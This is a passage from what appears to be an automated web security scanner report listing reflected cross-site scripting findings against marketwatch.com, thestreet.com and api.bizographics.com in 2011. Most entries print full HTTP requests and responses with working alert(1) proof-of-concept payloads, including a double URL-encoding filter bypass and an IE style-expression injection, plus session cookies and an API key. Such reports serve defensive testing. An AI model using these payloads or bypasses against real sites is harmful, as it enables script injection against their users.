Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg
Content-Length: 0

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp02
Date: Mon, 09 May 2011 16:19:57 GMT
Content-Length: 48079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bgf0d3c';675646231a1/api/Connect.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.121. http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.marketwatch.com
Path:	/bg/api/Connect.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbf81'%3b6901956f6df was submitted in the REST URL parameter 2. This input was echoed as cbf81';6901956f6df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

POST /bg/apicbf81'%3b6901956f6df/Connect.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg
Content-Length: 0

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-MACHINE: sbkdfpswebp05
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 16:20:17 GMT
Content-Length: 48113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bg/apicbf81';6901956f6df/Connect.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.122. http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.marketwatch.com
Path:	/bg/api/Pickup.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bb18'%3befcf4ee79b8 was submitted in the REST URL parameter 1. This input was echoed as 1bb18';efcf4ee79b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

POST /bg1bb18'%3befcf4ee79b8/api/Pickup.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg
Content-Length: 289

c=%7B%22c%22%3A+%22e1853f60b96d4a1a82e6838adac9347f%22%2C+%22s%22%3A+%2210.241.41.141%22%7D&m=%5B%7B%22h%22%3A+%7B%22t%22%3A+%22%2Fnews%2Flatest%22%2C+%22a%22%3A+%22subscribe%22%7D%2C+%22b%22%3A+%7B%2
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp04
Date: Mon, 09 May 2011 16:19:50 GMT
Content-Length: 48104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bg1bb18';efcf4ee79b8/api/Pickup.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.123. http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.marketwatch.com
Path:	/bg/api/Pickup.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e75e'%3b9176c8da092 was submitted in the REST URL parameter 2. This input was echoed as 1e75e';9176c8da092 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

POST /bg/api1e75e'%3b9176c8da092/Pickup.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg
Content-Length: 289

c=%7B%22c%22%3A+%22e1853f60b96d4a1a82e6838adac9347f%22%2C+%22s%22%3A+%2210.241.41.141%22%7D&m=%5B%7B%22h%22%3A+%7B%22t%22%3A+%22%2Fnews%2Flatest%22%2C+%22a%22%3A+%22subscribe%22%7D%2C+%22b%22%3A+%7B%2
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp01
Date: Mon, 09 May 2011 16:20:01 GMT
Content-Length: 48117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bg/api1e75e';9176c8da092/Pickup.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.124. http://www.marketwatch.com/investing/future/clm11 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.marketwatch.com
Path:	/investing/future/clm11

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1209'%3b829db53a5b2 was submitted in the REST URL parameter 2. This input was echoed as c1209';829db53a5b2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /investing/futurec1209'%3b829db53a5b2/clm11?link=MW_widget_latestnews_247wallst.com HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp04
Date: Mon, 09 May 2011 16:29:43 GMT
Content-Length: 47671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/investing/futurec1209';829db53a5b2/clm11';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.125. http://www.marketwatch.com/investing/future/clm11 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/investing/future/clm11

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd8d3%2522%253balert%25281%2529%252f%252ffe2b349d940 was submitted in the REST URL parameter 3. This input was echoed as fd8d3";alert(1)//fe2b349d940 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /investing/future/clm11fd8d3%2522%253balert%25281%2529%252f%252ffe2b349d940?link=MW_widget_latestnews_247wallst.com HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp03
Date: Mon, 09 May 2011 16:30:21 GMT
Content-Length: 81831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
uotes/lookup.asp"
s.prop6="http://fishhawk2.marketwatch.com/tools/quotes/lookup.asplookup=clm11fd8d3%22%3balert%281%29%2f%2ffe2b349d940&country=us"
s.prop9="open"
s.prop12="unknown"
s.prop13="clm11fd8d3";alert(1)//fe2b349d940"
s.prop19="tools"
s.eVar4="/tools/quotes/lookup.asp"
s.eVar11="MarketWatch"
s.prop48="quotepagePWS_1"
s.events="event12"

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************
...[SNIP]...

2.126. http://www.marketwatch.com/investing/future/clm11 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/investing/future/clm11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12738%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c1b89ef3e4b was submitted in the REST URL parameter 3. This input was echoed as 12738"style="x:expression(alert(1))"c1b89ef3e4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /investing/future/clm1112738%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c1b89ef3e4b?link=MW_widget_latestnews_247wallst.com HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg

Response (redirected)

2.127. http://www.marketwatch.com/investing/stock/clm11 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.marketwatch.com
Path:	/investing/stock/clm11

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95573'%3bd34e3333875 was submitted in the REST URL parameter 2. This input was echoed as 95573';d34e3333875 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /investing/stock95573'%3bd34e3333875/clm11?link=MW_widget_latestnews_247wallst.com HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp02
Date: Mon, 09 May 2011 16:27:16 GMT
Content-Length: 47618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/investing/stock95573';d34e3333875/clm11';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.128. http://www.marketwatch.com/investing/stock/clm11 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/investing/stock/clm11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe3e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25222c892b79b15 was submitted in the REST URL parameter 3. This input was echoed as dbe3e"style="x:expression(alert(1))"2c892b79b15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /investing/stock/clm11dbe3e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25222c892b79b15?link=MW_widget_latestnews_247wallst.com HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg

Response (redirected)

2.129. http://www.marketwatch.com/investing/stock/clm11 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/investing/stock/clm11

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32b59%2522%253balert%25281%2529%252f%252f433e45a22d4 was submitted in the REST URL parameter 3. This input was echoed as 32b59";alert(1)//433e45a22d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /investing/stock/clm1132b59%2522%253balert%25281%2529%252f%252f433e45a22d4?link=MW_widget_latestnews_247wallst.com HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp04
Date: Mon, 09 May 2011 16:27:55 GMT
Content-Length: 81756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
uotes/lookup.asp"
s.prop6="http://fishhawk2.marketwatch.com/tools/quotes/lookup.asplookup=clm1132b59%22%3balert%281%29%2f%2f433e45a22d4&country=us"
s.prop9="open"
s.prop12="unknown"
s.prop13="clm1132b59";alert(1)//433e45a22d4"
s.prop19="tools"
s.eVar4="/tools/quotes/lookup.asp"
s.eVar11="MarketWatch"
s.prop48="quotepagePWS_1"
s.events="event12"

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************
...[SNIP]...

2.130. http://www.thestreet.com/sponsor/financial-services/ad.ajaxaction [callbackfunction parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thestreet.com
Path:	/sponsor/financial-services/ad.ajaxaction

Issue detail

The value of the callbackfunction request parameter is copied into the HTML document as plain text between tags. The payload cb8ae<script>alert(1)</script>1eb5062f2d3 was submitted in the callbackfunction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sponsor/financial-services/ad.ajaxaction?callbackfunction=renderHeadlinescb8ae<script>alert(1)</script>1eb5062f2d3 HTTP/1.1
Host: www.thestreet.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html?cm_ven=GOOGLEN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; st_ctc=GOOGLEN; s_var_28=GOOGLEN; s_sq=%5B%5BB%5D%5D; rsi_segs=D08734_70008|D08734_72078; JSESSIONID=6BCA1FD9838EB7C39EA7A2580B702FAC; _jsuid=9688429766861324928; __gads=ID=52d278b46776945f:T=1304957830:S=ALNI_MZk9yUVKQRY7mIUZ54HVpbr9zjXtg; no_tracky=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 16:16:50 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 16:31:50 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 727
Set-Cookie: JSESSIONID=D4A5483DCFBBD4CADE01F2AF02BC40BF; Path=/
X-Cache: MISS from psquid03.dc.thestreet.com
X-Cache-Lookup: MISS from psquid03.dc.thestreet.com:80
Via: 1.0 psquid03.dc.thestreet.com:80 (squid)
Connection: keep-alive

renderHeadlinescb8ae<script>alert(1)</script>1eb5062f2d3(
{"logo":"","logoLink":"","storyLinkPuc":"1121576","puc":"financial-services","name":"The Street Picks","backToPartnerLink":"","results":[{"id":11111015,"link":"/story/11111015/1/citigroup-shares-shou
...[SNIP]...

2.131. http://api.bizographics.com/v1/profile.json [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 8cf92<script>alert(1)</script>71cdaec5251 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?callback=load_ad_callback&api_key=18d8c7d8c4d04d1588a9cf479a85164e HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: 8cf92<script>alert(1)</script>71cdaec5251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
